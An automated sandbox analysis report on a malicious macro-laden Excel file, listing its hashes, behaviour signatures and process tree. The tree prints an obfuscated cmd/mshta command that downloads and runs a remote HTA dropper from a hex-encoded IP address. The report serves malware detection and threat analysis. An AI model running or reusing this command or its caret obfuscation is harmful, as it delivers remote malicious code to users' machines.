Analysis

  • max time kernel: 150s
  • max time network: 137s
  • platform: windows10_x64
  • resource: win10-en-20211208
  • submitted: 19-01-2022 22:06

General

  • Target: c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm
  • Size: 115KB
  • MD5: 383a3c7cdb5a9070656164e0b90e41a5
  • SHA1: af0b4eedbd1c6d85705c26ebb3955f8b35a8cea8
  • SHA256: c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0
  • SHA512: c37692e7c9a60fcda701450a620f09c0c95db6e6a1ee3188c2897d09a621d80e3f0fb539506f458ab5c20a7e5adc8adfbe2bcad0860c4bb9484f6292eb391b9c

Score
10/10

Malware Config

Extracted

  • Language: hta
  • Source: hta.dropper
  • URLs: http://0x5cff39c3/sec/se1.html

Signatures

  • Process spawned unexpected child process (1 IoC)

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request (1 IoC)
  • Checks processor information in registry (2 TTPs, 3 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry (2 TTPs, 3 IoCs)
  • Suspicious behavior: AddClipboardFormatListener (1 IoC)
  • Suspicious use of SetWindowsHookEx (20 IoCs)
  • Suspicious use of WriteProcessMemory (6 IoCs)

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 2744)
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c3f53e74cbc71cf1956d17dae939c2d9f31a1c2e81328a3ca88ceb1e3bf652c0.xlsm"
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • C:\Windows\splwow64.exe (PID 3084)
      C:\Windows\splwow64.exe 12288
    • C:\Windows\SYSTEM32\cmd.exe (PID 2180)
      cmd /c m^sh^t^a h^tt^p^:/^/0x5cff39c3/sec/se1.html
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      • C:\Windows\system32\mshta.exe (PID 2988)
        mshta http://0x5cff39c3/sec/se1.html
        • Blocklisted process makes network request


Downloads

  • memory/2744-115-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp (64KB)
  • memory/2744-116-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp (64KB)
  • memory/2744-117-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp (64KB)
  • memory/2744-118-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp (64KB)
  • memory/2744-121-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp (64KB)
  • memory/2744-128-0x00007FF9D3640000-0x00007FF9D3650000-memory.dmp (64KB)
  • memory/2744-129-0x00007FF9D3640000-0x00007FF9D3650000-memory.dmp (64KB)